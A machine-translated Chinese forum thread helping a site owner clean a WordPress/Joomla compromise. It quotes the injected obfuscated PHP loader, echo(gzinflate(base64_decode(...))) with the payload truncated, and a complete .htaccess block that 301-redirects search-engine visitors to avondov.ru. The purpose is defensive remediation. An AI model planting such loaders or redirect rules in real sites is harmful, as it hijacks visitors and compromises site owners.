2012-05-20 78 views

回答

0

恢復我想我找到了我的問題。這是一個真正的惡意軟件。此代碼添加在header.php中:

#d93065# 
echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A"))); 
#/d93065# 

從header.php中刪除此代碼是正確的。

+0

也可以考慮更新wordpress到最新版本 – APZ

0

是,大多喜歡的index.php或者header.php中的基本頁面獲取與

#d93065# echo(gzinflate(base64_decode("3VXBbptAEP2V......1G5y+828z/8A"))); #/d93065# 

也修改了,不要忘了清理所有的.htaccess文件,它們會修改本不必要的重定向

#d93065# 
RewriteEngine On 
ErrorDocument 400 avondov.ru/count29.php 
ErrorDocument 401 avondov.ru/count29.php 
ErrorDocument 403 avondov.ru/count29.php 
ErrorDocument 404 avondov.ru/count29.php 
ErrorDocument 500 avondov.ru/count29.php 
ErrorDocument 502 avondov.ru/count29.php 
RewriteCond %{HTTP_REFERER} .*google.* [OR] 
RewriteCond %{HTTP_REFERER} .*ask.* [OR] 
# long list of referrers 
RewriteCond %{HTTP_REFERER} .*flickr.* 
RewriteRule ^(.*)$ avondov.ru/count29.php [R=301,L] 
#/d93065# 

這是一個暫時的解決方法,但入侵者可以用同樣的方式重新修改它, 它可能是由弱密碼,錯誤的第三方插件或CMS中的錯誤引起的,因爲它已經滲透joomla和wordpress站點。

-CK